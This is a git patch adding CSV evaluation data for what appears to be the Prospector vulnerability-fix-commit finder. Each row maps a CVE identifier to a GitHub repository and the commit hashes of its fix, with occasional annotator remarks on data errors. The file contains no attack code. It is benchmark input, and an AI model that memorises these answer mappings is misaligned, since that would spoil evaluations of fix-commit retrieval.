+CVE-2019-18888;https://github.com/symfony/symfony;None:None;False;0b2c3a43bcedb2ae23970a78e17f81eccbbe1661,b21025b139962bfb87501b40ec43e7c3e4801435,691486e43ce0e4893cd703e221bafc10a871f365,77ddabf2e785ea85860d2720cc86f7c5d8967ed5,6be5cc75a4817657c5574553a41bdd0193d4fe51,2dfc115f6dd56fcc12a6941e8050349cc4d04dbe; +CVE-2019-18889;https://github.com/symfony/cache;None:None;False;8d5db9c0cecf8b6f79fa96583fae652224d897da; +CVE-2019-18923;https://github.com/cactus/go-camo;None:None;False;c1a5f28e28dd0b276269fe18ce1d4b794aa70655,add2d78c67fcfb9f2e78f38be35e85cf1858794d; +CVE-2019-18954;https://github.com/NetEase/pomelo;None:None;False;e0de00abf82e3306a53afc547fe0539f26fb152d,5b999c56c7244e23e5003878402a3c54ab51ed8c; +CVE-2019-18978;https://github.com/cyu/rack-cors;None:None;False;e4d4fc362a4315808927011cbe5afcfe5486f17d; +CVE-2019-18981;https://github.com/pimcore/pimcore;None:None;False;0a5d80b2593b2ebe35d19756b730ba33aa049106; +CVE-2019-18982;https://github.com/pimcore/pimcore;None:None;False;e0b48faf7d29ce43a98825a0b230e88350ebcf78; +CVE-2019-18985;https://github.com/pimcore/pimcore;None:None;False;9f2d075243a8392c114d9a8028858b9faf041e2d; +CVE-2019-18986;https://github.com/pimcore/pimcore;None:None;False;4a7bba5c3f818852cbbd29fa124f7fb09a207185; +CVE-2019-19010;https://github.com/ProgVal/Limnoria;None:None;False;3848ae78de45b35c029cc333963d436b9d2f0a35; +CVE-2019-19118;https://github.com/django/django;None:None;False;11c5e0609bcc0db93809de2a08e0dc3d70b393e4,36f580a17f0b3cb087deadf3b65eea024f479c21,103ebe2b5ff1b2614b85a52c239f471904d26244,092cd66cf3c3e175acce698d6ca2012068d878fa; +CVE-2019-19212;https://github.com/Dolibarr/dolibarr;None:None;False;6431e8e16d8ca778d222097a51c927a0526c8101; was 10.0.3:10.0.4 +CVE-2019-19274;https://github.com/python/typed_ast;None:None;False;156afcb26c198e162504a57caddfe0acd9ed7dce,dc317ac9cff859aa84eeabe03fb5004982545b3b; +CVE-2019-19275;https://github.com/python/typed_ast;None:None;False;dc317ac9cff859aa84eeabe03fb5004982545b3b; +CVE-2019-19316;https://github.com/hashicorp/terraform;None:None;False;6db3cf8e5b4cfb2a3cd1d99a813b50b2d5d363bb; commit is outside the time interval +CVE-2019-19325;https://github.com/silverstripe/silverstripe-framework;None:None;False;ad1b00ec7dc1589a05bfc7f5f8207489797ef714,49fda52b12ba59f0a04bcabf78425586a8779e89; +CVE-2019-19507;https://github.com/manvel-khnkoyan/jpv;None:None;False;fdab85599fd92aea87af35fb4c52ba26ccbdd427; +CVE-2019-19576;https://github.com/getk2/k2;None:None;False;d1344706c4b74c2ae7659b286b5a066117155124; +CVE-2019-19619;https://github.com/documize/community;None:None;False;a4384210d4d0d6b18e6fdb7e155de96d4a1cf9f3; +CVE-2019-19687;https://github.com/openstack/keystone;None:None;False;17c337dbdbfb9d548ad531c2ad0483c9bce5b98f; +CVE-2019-19703;https://github.com/ktorio/ktor;None:None;False;0c108156f45423d09014b47be810188629cb878f; +CVE-2019-19794;https://github.com/miekg/dns;None:None;False;8ebf2e419df7857ac8919baa05248789a8ffbf33; +CVE-2019-19844;https://github.com/django/django;None:None;False;f4cff43bf921fcea6a29b726eb66767f67753fa2,4d334bea06cac63dc1272abcec545b85136cca0e,302a4ff1e8b1c798aab97673909c7a3dfda42c26,5b1fbcef7a8bec991ebe7b2a18b5d5a95d72cb70; +CVE-2019-19919;https://github.com/handlebars-lang/handlebars.js;None:None;False;2078c727c627f25d4a149962f05c1e069beb18bc,213c0bbe3c4bd83a534d67384e5afa0000347ff6; +CVE-2019-20330;https://github.com/FasterXML/jackson-databind;None:None;False;fc4214a883dc087070f25da738ef0d49c2f3387e; +CVE-2019-20444;https://github.com/netty/netty;None:None;False;745814b382e828c344aeff2ab4fd9530fbb7cdfe,a7c18d44b46e02dadfe3da225a06e5091f5f328e; +CVE-2019-1000005;https://github.com/mpdf/mpdf;None:None;False;20ff6399433c18233f31817ba2f35a86dd9d5e22; commit is outside the time interval +CVE-2019-1000007;https://github.com/horazont/aioxmpp;None:None;False;f151f920f439d97d4103fc11057ed6dc34fe98be,29ff0838a40f58efe30a4bbcea95aa8dab7da475; +CVE-2019-1000021;https://github.com/poezio/slixmpp;None:None;False;7cd73b594e8122dddf847953fcfc85ab4d316416; +CVE-2019-1002101;https://github.com/kubernetes/kubernetes;None:None;False;47063891dd782835170f500a83f37cc98c3c1013,ee7edb77659902afbe2f7b872159cf9f952a8e23,b18e16e5ca330fccaef34798cabf64fd9f23409b,c14a780d3af9f3b66e561ce0d7380e18e8fa1bf9,185dec7f90110c29353dac4609684470349f4b6e,38a3162748adb2ca733fd4de9558fc77f60cfa8e,972b75de1377aff7a5cdba82ac4c86fdd32da07b,2f9ad66eaca587e516d5edd5edd070efc118b31f; introduced by... +CVE-2019-1010142;https://github.com/secdev/scapy;None:None;False;0d7ae2b039f650a40e511d09eb961c782da025d9,905c80d6ed435477224c53de8850f763b04d495d; +CVE-2019-1010266;https://github.com/lodash/lodash;None:None;False;5c08f18d365b64063bfbfa686cbb97cdd6267347; +CVE-2019-1010306;https://github.com/stevegraham/slanger;None:None;False;f26f80c675dc4d853bce401743779a6959981af1,5267b455caeb2e055cccf0d2b6a22727c111f5c3; +CVE-2019-1020012;https://github.com/parse-community/parse-server;None:None;False;8709daf698ea69b59268cb66f0f7cee75b52daa5; +CVE-2020-1747;https://github.com/yaml/pyyaml;None:None;False;5080ba513377b6355a0502104846ee804656f1e0; +CVE-2020-1928;https://github.com/apache/nifi;None:None;False;34f2a592df8996b5f9e65039a35ecd8c31417fbd; +CVE-2020-1935;https://github.com/apache/tomcat;None:None;False;702bf15bea292915684d931526d95d4990b2e73d,ae8c82eff96990878e79691819ae941538ee62fd,8fbe2e962f0ea138d92361921643fe5abe0c4f56,8bfb0ff7f25fe7555a5eb2f7984f73546c11aa26,b191a0d9cf06f4e04257c221bfe41d2b108a9cc8,959f1dfd767bf3cb64776b44f7395d1d8d8f7ab3,060ecc5eb839208687b7fcc9e35287ac8eb46998; last three not correct from tracer +CVE-2020-1937;https://github.com/apache/kylin;None:None;False;e373c64c96a54a7abfe4bccb82e8feb60db04749,1f9f44ceb818b46518176e81c6dea5a0d12750cf; +CVE-2020-1938;https://github.com/apache/tomcat;None:None;False;f7180bafc74cb1250c9e9287b68a230f0e1f4645,0f725b323a74b64cdb35fce04b54427582ad6063,15cd78c528425c693f1d2b51057f32d3d63d360a,b99fba5bd796d876ea536e83299603443842feba,0d633e72ebc7b3c242d0081c23bba5e4dacd9b72,bd5ebb63e438a253bbd9b035425ece915d3feb21,4c933d80e340b4a841a672060351b2190b326782; +CVE-2020-1940;https://github.com/apache/jackrabbit-oak;None:None;False;9b78a60d5d0c3e199c006d92590dc29d39379679,756d0387ef39dc3a7a84f6644a318e74535953e6,b615992fc5202046e9479a29d6a7bd41d6258d09,3e1c6e13b67331710a1747223d8e6ee22c5fae9c,21a47b758bb24b1327c795cf421dc755f7959d2f,e7180a8d9c4f14b2de1928861dd27287e5fb59bd,138318257a57703ef6dd0f7430c115f41ffe8f85; +CVE-2020-5215;https://github.com/tensorflow/tensorflow;None:None;False;5ac1b9e24ff6afc465756edf845d2e9660bd34bf,c6170fb37c65556fda58a014d8a3235ad75f1cfc,7dc97c2704f49f20719facd1f9983c114b0b451b,e7201bae4a618ce14d4b6e11ef47fa38d7f3ffb3,54a06baa1cf13bd7057c5ce372c90f6bbe1cbc57; +CVE-2020-5219;https://github.com/peerigon/angular-expressions;None:None;False;061addfb9a9e932a970e5fcb913d020038e65667; +CVE-2020-5223;https://github.com/PrivateBin/PrivateBin;None:None;False;2caddf985f35c6b660b19ff62bb9ddd2d9f33118,4bf7f863dc2ffea1ea105e575205ab0f83ed2751,8d0ac336d23cd8c98e71d5f21cdadcae9c8a26e6; +CVE-2020-5224;https://github.com/jazzband/django-user-sessions;None:None;False;f0c4077e7d1436ba6d721af85cee89222ca5d2d9; +CVE-2020-5227;https://github.com/lkiesow/python-feedgen;None:None;False;f57a01b20fa4aaaeccfa417f28e66b4084b9d0cf; +CVE-2020-5229;https://github.com/opencast/opencast;None:None;False;32bfbe5f78e214e2d589f92050228b91d704758e; +CVE-2020-5230;https://github.com/opencast/opencast;None:None;False;cd15f4017d9dc2836f5ffbdeeb115607501b7e97,bbb473f34ab95497d6c432c81285efb0c739f317; +CVE-2020-5232;https://github.com/ensdomains/ens;None:None;False;36e10e71fcddcade88646821e0a57cc6c19e1ecf; +CVE-2020-5233;https://github.com/oauth2-proxy/oauth2-proxy;None:None;False;0198dd6e9378405c432810e190288d796da46e4d,a316f8a06f3c0ca2b5fc5fa18a91781b313607b2; +CVE-2020-5236;https://github.com/Pylons/waitress;None:None;False;6e46f9e3f014d64dd7d1e258eaf626e39870ee1f; +CVE-2020-5237;https://github.com/1up-lab/OneupUploaderBundle;None:None;False;a6011449b716f163fe1ae323053077e59212350c,d59fcd2e5f675ee83c53965e16d21a942e90a9ef; +CVE-2020-5243;https://github.com/ua-parser/uap-core;None:None;False;0afd61ed85396a3b5316f18bfd1edfaadf8e88e1,a679b131697e7371f0441f4799940779efa2f27e,dd279cff09546dbd4174bd05d29c0e90c2cffa7c,7d92a383440c9742ec878273c90a4dcf8446f9af,e9a1c74dae9ecd4aa6385bd34ef6c7243f89b537; +CVE-2020-5245;https://github.com/dropwizard/dropwizard;None:None;False;d87d1e4f8e20f6494c0232bf8560c961b46db634,28479f743a9d0aab6d0e963fc07f3dd98e8c8236; +CVE-2020-5247;https://github.com/puma/puma;None:None;False;c36491756f68a9d6a8b3a49e7e5eb07fe6f1332f,694feafcd4fdcea786a0730701dad933f7547bea,1b17e85a06183cd169b41ca719928c26d44a6e03; +CVE-2020-5249;https://github.com/puma/puma;None:None;False;c22712fc93284a45a93f9ad7023888f3a65524f3; +CVE-2020-5310;https://github.com/python-pillow/Pillow;None:None;False;4e2def2539ec13e53a82e06c4b3daf00454100c4,b9c68540dc7091c644860a7ed31ec4b79dd9363e; +CVE-2020-5311;https://github.com/python-pillow/Pillow;None:None;False;be44f0d9923485f3ed3a7a9fd479cf8cf69d814a,a79b65c47c7dc6fe623aadf09aa6192fc54548f3; +CVE-2020-5312;https://github.com/python-pillow/Pillow;None:None;False;8f0c8f731190f761180bed827d07b7a740d8555b,93b22b846e0269ee9594ff71a72bec02d2bea8fd; +CVE-2020-5313;https://github.com/python-pillow/Pillow;None:None;False;c40bc258472c83168a997a9bf4e4b5934397774a,a09acd0decd8a87ccce939d5ff65dab59e7d365b; +CVE-2020-5390;https://github.com/IdentityPython/pysaml2;None:None;False;5e9d5acbcd8ae45c4e736ac521fd2df5b1c62e25; +CVE-2020-5398;https://github.com/spring-projects/spring-framework;None:None;False;6ce19ff86138a9dd284588fb62c73af5bc97ec66,0583b334b46cf2a591c72c2708ee3d2ac5d2b58c,41f40c6c229d3b4f768718f1ec229d8f0ad76d76,956ffe68587c8d5f21135b5ce4650af0c2dea933; +CVE-2020-5529;https://github.com/HtmlUnit/htmlunit;None:None;False;934390fefcd2cd58e6d86f2bc19d811ae17bfa28; +CVE-2020-6802;https://github.com/mozilla/bleach;None:None;False;f77e0f6392177a06e46a49abd61a4d9f035e57fd,996cde7a2439a2323f9c4b2567c8b8449d393351; +CVE-2020-6816;https://github.com/mozilla/bleach;None:None;False;175f67740e7951e1d80cefb7831e6c3e4efeb986,e4e9e21e7aebff40c88fafa4319bba4636a602d9; +CVE-2020-6836;https://github.com/handsontable/formula-parser;None:None;False;396b089738d4bf30eb570a4fe6a188affa95cd5e; +CVE-2020-7212;https://github.com/urllib3/urllib3;None:None;False;a74c9cfbaed9f811e7563cfc3dce894928e0221a,a2697e7c6b275f05879b60f593c5854a816489f0; +CVE-2020-7219;https://github.com/hashicorp/consul;None:None;False;b788f729e9653d4a81691cbccedca2a2ac06f5ea,5531678e9eb7c5548df8fa86e9e77a573c233e46; Version mismatch, re run +CVE-2020-7596;https://github.com/codecov/codecov-node;None:None;False;f429409922cc52d0684f6e8f897363b363ed04cd,2f4eff90dd21e58dd56074dc4933b15a91373de6; +CVE-2020-7597;https://github.com/codecov/codecov-node;None:None;False;02cf13d8b93ac547b5b4c2cfe186b7d874fd234f; +CVE-2020-7598;https://github.com/minimistjs/minimist;None:None;False;38a4d1caead72ef99e824bb420a2528eec03d9ab,63e7ed05aa4b1889ec2f3b196426db4500cbda94; This repo was wrong (not existant). I expect it to not find anything +CVE-2020-7608;https://github.com/yargs/yargs-parser;None:None;False;63810ca1ae1a24b08293a4d971e70e058c7a41e2,6e36df108cd8ed6443c4d4a4536b55b6e9552b3d,c893d3072f7d31243b750b1d599b0826b8aaefa4; +CVE-2020-7981;https://github.com/alexreisner/geocoder;None:None;False;dcdc3d8675411edce3965941a2ca7c441ca48613; +CVE-2020-8116;https://github.com/sindresorhus/dot-prop;None:None;False;3039c8c07f6fdaa8b595ec869ae0895686a7a0f2,c914124f418f55edea27928e89c94d931babe587; +CVE-2020-8125;https://github.com/lukeed/klona;None:None;False;200e8d1fd383a54790ee6fc8228264c21954e38e; +CVE-2020-8131;https://github.com/yarnpkg/yarn;None:None;False;0e7133ca28618513503b4e1d9063f1c18ea318e5; +CVE-2020-8134;https://github.com/TryGhost/Ghost;None:None;False;47739396705519a36018686894d1373e9eb92216,a98579c2ef52e09349ee08f36a2a3e2e3670568a; +CVE-2020-8840;https://github.com/FasterXML/jackson-databind;None:None;False;9bb52c7122271df75435ec7e66ecf6b02b1ee14f,914e7c9f2cb8ce66724bf26a72adc7e958992497; +CVE-2020-8945;https://github.com/proglottis/gpgme;None:None;False;92153bcb59bd2f511e502262c46c7bd660e21733,d43d199046c30db9bef90de20c09843bb8b45737,d575e5df6a8359a0ad12f59a8377d362c3eb6afd,7e8c79da5ec1bd810f01f46df83a8a914e49f4fa; +CVE-2020-9281;https://github.com/ckeditor/ckeditor4;None:None;False;0e15fa67271bd2e8b165c48368968f2e908860d7; +CVE-2020-9283;https://github.com/golang/crypto;None:None;False;bac4c82f69751a6dd76e702d54b3ceb88adab236; +CVE-2020-9402;https://github.com/django/django;None:None;False;fe886a3b58a93cfbe8864b485f93cb6d426cd1f2,02d97f3c9a88adc890047996e5606180bd1c6166,26a5cf834526e291db00385dd33d319b8271fc4c,6695d29b1c1ce979725816295a26ecc64ae0e927; +CVE-2020-9546;https://github.com/FasterXML/jackson-databind;None:None;False;1e64db6a2fad331f96c7363fda3bc5f3dffa25bb,9f4e97019fb0dd836533d0b6198c88787e235ae2; +CVE-2020-9547;https://github.com/FasterXML/jackson-databind;None:None;False;1e64db6a2fad331f96c7363fda3bc5f3dffa25bb,9f4e97019fb0dd836533d0b6198c88787e235ae2; +CVE-2020-9548;https://github.com/FasterXML/jackson-databind;None:None;False;1e64db6a2fad331f96c7363fda3bc5f3dffa25bb,9f4e97019fb0dd836533d0b6198c88787e235ae2; +CVE-2020-10236;https://github.com/Froxlor/Froxlor;None:None;False;6b09720ef8a1cc008751dd0ca0140a0597fedce5; +CVE-2020-10591;https://github.com/walmartlabs/concord;None:None;False;ab32c17f85200545ed6376badc528c7df95f5adb; +CVE-2020-10594;https://github.com/Styria-Digital/django-rest-framework-jwt;None:None;False;bea6d8f4099e4794c2b74a97ff85bd0401514313,868b5c22ddad59772b447080183e7c7101bb18e0; +CVE-2020-10672;https://github.com/FasterXML/jackson-databind;None:None;False;592872f4235c7f2a3280725278da55544032f72d; +CVE-2020-10673;https://github.com/FasterXML/jackson-databind;None:None;False;1645efbd392989cf015f459a91c999e59c921b15; \ No newline at end of file From 35e93ae469e137fddb51f83bf802a3ee7b89bc4d Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 18 Jul 2024 14:58:39 +0000 Subject: [PATCH 040/130] renames dataset --- prospector/evaluation/data/input/d63.csv | 1320 ++++++++++++++++++++++ 1 file changed, 1320 insertions(+) create mode 100644 prospector/evaluation/data/input/d63.csv diff --git a/prospector/evaluation/data/input/d63.csv b/prospector/evaluation/data/input/d63.csv new file mode 100644 index 000000000..c5f208544 --- /dev/null +++ b/prospector/evaluation/data/input/d63.csv @@ -0,0 +1,1320 @@ +ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS +CVE-2009-0217;https://github.com/mono/mono;None:None;False;b79738dc7f734a78039567ea35f4e6a7d319a227,e2be4afec1d41aacd7c0a35605e369a55c4fe3a6,939994df00fc3e1372b9dc1243e261e2f6c6c133,c20551c1942db667672b36a07856467caace2d92,8bb489774f42a734947859a1742ee5710efd9b49,c48fa75d0c8f8e16a554de988cbadcb298fce013,cbfbf2f522399692d0edf7741746e300453338ca,3b1cee23d6f2f69f8444a5a1def4051028abff5f,14846e6f2f0c8e95b3eec525ee9367bcd0; +CVE-2010-0156;https://github.com/puppetlabs/puppet;None:None;False;0aae57f91dc69b22fb674f8de3a13c22edd07128,6111ba80f2c6f6d1541af971f565119e6e03d77d; +CVE-2010-0684;https://github.com/apache/activemq;None:None;False;1f464b9412e1b1c08d40c8ffac40edd52731da48,fed39c3619825bd92990cf1aa7a4e85119e00a6e,2895197d0dad246757d8d1d9eea181cbf0543ae9,9dc43f3ffe85c9c56faee235a21f23bfceb865c8; +CVE-2010-2076;https://github.com/apache/cxf;None:None;False;63a0a674a46aa24bf020bcb3d9e71bc0ad130c64,fec9e63fda69a3ef21679cd811efa2a0c100ce95; +CVE-2010-2245;https://github.com/apache/attic-wink;None:None;False;531771e5b2bf2f470fe728efe25e471d3b23659f; vulnerable tag is fixed +CVE-2010-4534;https://github.com/django/django;None:None;False;17084839fd7e267da5729f2a27753322b9d415a0,85207a245bf09fdebe486b4c7bbcb65300f2a693,732198ed5c2a127249970e0cd4218d093a38e9a2; +CVE-2010-4535;https://github.com/django/django;None:None;False;6819be1ea17ace34ae3a5c31ab0be960e99fcb85,d5d8942a160685c403d381a279e72e09de5489a9,7f8dd9cbac074389af8d8fd235bf2cb657227b9a; +CVE-2010-5142;https://github.com/chef/chef;None:None;False;2810e43ca6c05046a9ba1392fd8163c3e617ddc1,8d6de424c7ed977b3c7f232b585ef7d63647ac51; +CVE-2010-5312;https://github.com/jquery/jquery-ui;None:None;False;7e9060c109b928769a664dbcc2c17bd21231b6f3; +CVE-2011-1772;https://github.com/apache/struts;None:None;False;885ab3459e146ff830d1f7257f809f4a3dd4493a; vulnerable tag is fixed +CVE-2011-1950;https://github.com/plone/plone.app.users;None:None;False;282ca1eb510aea43bcddf6ad005446074d29efc3; +CVE-2011-2730;https://github.com/spring-projects/spring-framework;None:None;False;9772eb8410e37cd0bdec0d1b133218446c778beb,62ccc8dd7e645fb91705d44919abac838cb5ca3f; fixed tag is vulnerable v3.2.0.RELEASE is the first containing the fix in theory +CVE-2011-2732;https://github.com/spring-projects/spring-security;None:None;False;f5fbda42e5f494f1a8aa96a0f8b35d60a4f57556,a087e828a63edf0932e4eecf174cf816cbe6a58a,5238ba0e2615ef733a906b264c6c06a4446a886b; +CVE-2011-2765;https://github.com/irmen/Pyro3;None:None;False;554e095a62c4412c91f981e72fd34a936ac2bf1e; +CVE-2011-2929;https://github.com/rails/rails;None:None;False;5f94b93279f6d0682fafb237c301302c107a9552,e0c03f8a2e727619c1eb1822d100d8c920d8bf12,09ad48f22e0b32b6485bc122f7f220045aed1198; +CVE-2011-2930;https://github.com/rails/rails;None:None;False;8a39f411dc3c806422785b1f4d5c7c9d58e4bf85,f9b642cb15d37c9fc76c98ba4c11fa181b730178,fb4747bcf1659a94d76ac221d66ce44148ca7b49,6b46d655978ace0a6cfa6ad8b814d97c86a8830f; +CVE-2011-2931;https://github.com/rails/rails;None:None;False;586a944ddd4d03e66dea1093306147594748037a,3480d97b6c9f657ca1d0f11ac1e3e17baf84cdb2,66c3e31dcf314ab0fcabe717576d0b606c685d0e,60f783d9cedb151230074c216b338267e288d72d; +CVE-2011-2932;https://github.com/rails/rails;None:None;False;bfc432574d0b141fd7fe759edfe9b6771dd306bd,a19ee5cfd35fe85fd065be30de5af6b20363b682; +CVE-2011-3186;https://github.com/rails/rails;None:None;False;11dafeaa7533be26441a63618be93a03869c83a9; +CVE-2011-3848;https://github.com/puppetlabs/puppet;None:None;False;fe2de817b43a427a3c6fd629c5e13949b222ac34,c275a518d10bc9ef87d330c052cdc3d6f4241942,47135fbea8004f49c3255ae2052cb2357b325300; +CVE-2011-3869;https://github.com/puppetlabs/puppet;None:None;False;7d4c169df84fc7bbeb2941bf995a63470f71bdbd,2775c21ae48e189950dbea5e7b4d1d9fa2aca41c,e7a69952c052e89acc5b57a51ac0680a7a9a5977; +CVE-2011-3870;https://github.com/puppetlabs/puppet;None:None;False;b29b1785d543a3cea961fffa9b3c15f14ab7cce0,88512e880bd2a03694b5fef42540dc7b3da05d30; +CVE-2011-3871;https://github.com/puppetlabs/puppet;None:None;False;d76c30935460ded953792dfe49f72b8c5158e899,343c7bd381b63e042d437111718918f951d9b30d; +CVE-2011-3872;https://github.com/puppetlabs/puppet;None:None;False;94345ebac6d79a890efc5f49e136c4f76ddda3ef,bab9310d2800dd3c24e002f9d85c808ee38c9d3c,e4ee7947fd58e4fc49c5bce484cce7b5f60470ae,9ee12151e9c83d2b477ea5b04dd7d52e749a6992; +CVE-2011-3923;https://github.com/apache/struts;None:None;False;2c1eb6bb57f90db7287fc3ed0086793d0a43fe9e; +CVE-2011-4030;https://github.com/plone/Products.CMFEditions;None:None;False;d55add52e5900967c8cc78becc6790048f02015b; +CVE-2011-4104;https://github.com/django-tastypie/django-tastypie;None:None;False;e8af315211b07c8f48f32a063233cc3f76dd5bc2,be245106125961a322f935195c1d3bca6f978bfe; +CVE-2011-4461;https://github.com/eclipse/jetty.project;None:None;False;085c79d7d6cfbccc02821ffdb64968593df3e0bf; +CVE-2011-4838;https://github.com/jruby/jruby;None:None;False;f007944b459e7c5e33b8296433d8b9d704bf02cc,cc77504eda2546a36d3ca45d30e9dc3cc7a38bf6,c1c9f95ed29cb93806fbc90e9eaabb9c406581e5; +CVE-2011-5036;https://github.com/rack/rack;None:None;False;5b9d09a81a9fdc9475f0ab0095cb2a33bf2a8f91,e8fb5045fd9a28386425975b57414d46471a5263,09c5e53f11a491c25bef873ed146842f3cd03228,bf4b55ccfbe53f967d0bd52807eeb499ff4f9654; +CVE-2011-5097;https://github.com/chef/chef;None:None;False;a4ea6edab2fecb922f999cffb0daa04eeeec7a26,4402493061cdce76495d2408c8a9331c530c6cbf; +CVE-2011-5098;https://github.com/chef/chef;None:None;False;33f0e9c58bbf047e1b401a834f3abfe72d9a8947,7a09597360c256f6164047b62782a2a1e0a3d68a; +CVE-2012-0392;https://github.com/apache/struts;None:None;False;b4265d369dc29d57a9f2846a85b26598e83f3892,5f54b8d087f5125d96838aafa5f64c2190e6885b; vulnerable tag is fixed +CVE-2012-0394;https://github.com/apache/struts;None:None;False;b4265d369dc29d57a9f2846a85b26598e83f3892,5f54b8d087f5125d96838aafa5f64c2190e6885b; vulnerable tag is fixed +CVE-2012-0881;https://github.com/apache/xerces2-j;None:None;False;992b5d9c24102ad20330d36c0a71162753a37449; +CVE-2012-1054;https://github.com/puppetlabs/puppet;None:None;False;146953861e007a91545fdbd0ea59ab3509326e09,0c967037ec8305aceb81f0a3e5d2969054bce2e2; +CVE-2012-1098;https://github.com/rails/rails;None:None;False;9435f5a479317458c558ae743b7d876dd5a5db20,d1fc35fe196ee2913bc34e5c581a5284610d05d1,c60c1c0812d5eb55e7024db350f8bc5b6729f7fe; +CVE-2012-1099;https://github.com/rails/rails;None:None;False;1be2bbec310ffe94061cca7ba0e3c1a478af03af,7b73913701ff41981d166ca457e41690aac3bce3,5b4082fddf3412aef6c085fbb2a13fd3bbc75f4e; +CVE-2012-1109;https://github.com/pediapress/mwlib;None:None;False;aa987c281c10e29f26aa0faa21c04f3bb1167fde; +CVE-2012-1176;https://github.com/pediapress/pyfribidi;None:None;False;d2860c655357975e7b32d84e6b45e98f0dcecd7a; +CVE-2012-1906;https://github.com/puppetlabs/puppet;None:None;False;c51447dfa81c9751fdc7663e0e91a9c9238abcaa,46e8dc06aa31426ec3bf5203e46107d72a9ba398; +CVE-2012-1986;https://github.com/puppetlabs/puppet;None:None;False;0d6d29933e613fe177e9235415919a5428db67bc,568ded50ec6cc498ad32ff7f086d9f73b5d24c14; +CVE-2012-1987;https://github.com/puppetlabs/puppet;None:None;False;91e7ce478649490d87684661f79d70b5ca46ddd0,568ded50ec6cc498ad32ff7f086d9f73b5d24c14,0d6d29933e613fe177e9235415919a5428db67bc; +CVE-2012-2098;https://github.com/apache/commons-compress;None:None;False;8f702469cbf4c451b6dea349290bc4af0f6f76c7,fdd7459bc5470e90024dbe762249166481cce769,0600296ab8f8a0bbdfedd483f51b38005eb8e34e; +CVE-2012-2139;https://github.com/mikel/mail;None:None;False;29aca25218e4c82991400eb9b0c933626aefc98f,ac56f03bdfc30b379aeecd4ff317d08fdaa328c2; +CVE-2012-2378;https://github.com/apache/cxf;None:None;False;9bb4612d3352ef3e3292fdce25e3c70b43d63c6f; +CVE-2012-2379;https://github.com/apache/cxf;None:None;False;440528d928be1e2030e7227b958c9c072847d9b2,4500bf901cb2a7312291b6663045f28a95d2a0c4; +CVE-2012-2417;https://github.com/Legrandin/pycrypto;None:None;False;9f912f13df99ad3421eff360d6a62d7dbec755c2; +CVE-2012-2660;https://github.com/rails/rails;None:None;False;060c91cd59ab86583a8f2f52142960d3433f62f5,5b83bbfab7d5770ed56366d739ff62ac70425008,dff6db18840e2fd1dd3f3e4ef0ae7a9a3986d01d; +CVE-2012-2661;https://github.com/rails/rails;None:None;False;9340f89849606dba02f44038171f3837f883fd4e,99f030934eb8341db333cb6783d0f42bfa57358f,b71d4ab9d7d61ebe3411a8754e9fe93d3587704e,71f7917c553cdc9a0ee49e87af0efb7429759718,176af7eff2e33b331c92febbeda98123da1151f3,8355abf153615a717c0d0e4a58b2bfca39b35025,cc2903da9f13c26ba3d94c149f31d4c53b94b2ed; +CVE-2012-3366;https://github.com/Bcfg2/bcfg2;None:None;False;a524967e8d5c4c22e49cd619aed20c87a316c0be; +CVE-2012-3408;https://github.com/puppetlabs/puppet;None:None;False;ab9150baa1b738467a33b01df1d90e076253fbbd; +CVE-2012-3451;https://github.com/apache/cxf;None:None;False;deeeaa95a861b355068ca6febc7aa02a4a8c51e5,878fe37f0b09888a42005fedc725ce497b5a694a,7230648f96573820d5bfa82c92c637391b448897,9c70abe28fbf2b4c4df0b93ed12295ea5a012554; +CVE-2012-3458;https://github.com/bbangert/beaker;None:None;False;91becae76101cf87ce8cbfabe3af2622fc328fe5; +CVE-2012-3536;https://github.com/apache/james-hupa;None:None;False;aff28a8117a49969b0fc8cc9926c19fa90146d8d; +CVE-2012-3865;https://github.com/puppetlabs/puppet;None:None;False;d80478208d79a3e6d6cb1fbc525e24817fe8c4c6,554eefc55f57ed2b76e5ee04d8f194d36f6ee67f; +CVE-2012-3867;https://github.com/puppetlabs/puppet;None:None;False;f3419620b42080dad3b0be14470b20a972f13c50,bd2820ec6ee8a45f57fcc57f79dddde0062cdca7,4d7c9fd9f65c6daaf47515d2faec90b448e3821d,dfedaa5fa841ccf335245a748b347b7c7c236640,0144e687b663a9ae170a4cdb55f8dcc1571128ea,9607bd784b2f04b759932d36e843ba42d82635f1; +CVE-2012-4386;https://github.com/apache/struts;None:None;False;a1ca307981b0930d1687ed89f0b7305af79da0f3,1081c52be93abfd2f33ba8453c676e3edcedec8b; one commit outside time interval, other not included in the tag, use STRUTS_2_3_4_1 +CVE-2012-4387;https://github.com/apache/struts;None:None;False;87935af56a27235e9399308ee1fcfb74f8edcefa,80e03182d66d9e6ab18f9a9a9b3c42725a1c89e9; one commit outside time interval, other not included in the tag, use STRUTS_2_3_4_1 +CVE-2012-4449;https://github.com/apache/hadoop;None:None;False;2847693311ed09aa9440a6157f1a8c072d50ca2e,38ec8babda50215f984e5f5532ae70918af77378,d6b7f10438677507fbe1adadec28d219889eab5b; +CVE-2012-4520;https://github.com/django/django;None:None;False;9305c0e12d43c4df999c3301a1f0c742264a657e,b45c377f8f488955e0c7069cad3f3dd21910b071,92d3430f12171f16f566c9050c40feefb830a4a3; +CVE-2012-5055;https://github.com/spring-projects/spring-security;None:None;False;f5fc94e1be40f3a62dd5a8687e4cfd5fe2130dea,915b2acf73a75c4e51e67a3c7fd85f908df6259b,c076f0f2e190c73a17379d05935c2c81657adee9; +CVE-2012-5633;https://github.com/apache/cxf;None:None;False;1a6b532d53a7b98018871982049e4b0c80dc837c,db11c9115f31e171de4622149f157d8283f6c720,d99f96aa970d9f2faa8ed45e278a403af48757ae,e733c692e933a7f82424d3744aace9304cd5d4f6,94a98b3fe9c79e2cf3941acbbad216ba54999bc0; +CVE-2012-5812;https://github.com/ACRA/acra;None:None;False;fff732595164baf233d911386a3965dc516cf081; +CVE-2012-6550;https://github.com/zeroclipboard/zeroclipboard;None:None;False;51b67b6d696f62aaf003210c08542588222c4913; +CVE-2012-6662;https://github.com/jquery/jquery-ui;None:None;False;5fee6fd5000072ff32f2d65b6451f39af9e0e39e,f2854408cce7e4b7fc6bf8676761904af9c96bde; +CVE-2012-6684;https://github.com/jgarber/redcloth;None:None;False;cddd03b87fe75b6681405066796bf4ef88b37149,b9bec13a245481f577c032a7df88513869b4d1b1,2f6dab4d6aea5cee778d2f37a135637fe3f1573c,39700cb12b2b882b1bd4900877d18059c31bbe04; +CVE-2012-6685;https://github.com/sparklemotion/nokogiri;None:None;False;599856367150709497a3a03bee930bd76504d95d,6d93d73498ed061dec5967d6471cd544c2b99a71,b2c28099ecb736d2fac4446fb062cfa20dd81d6f; 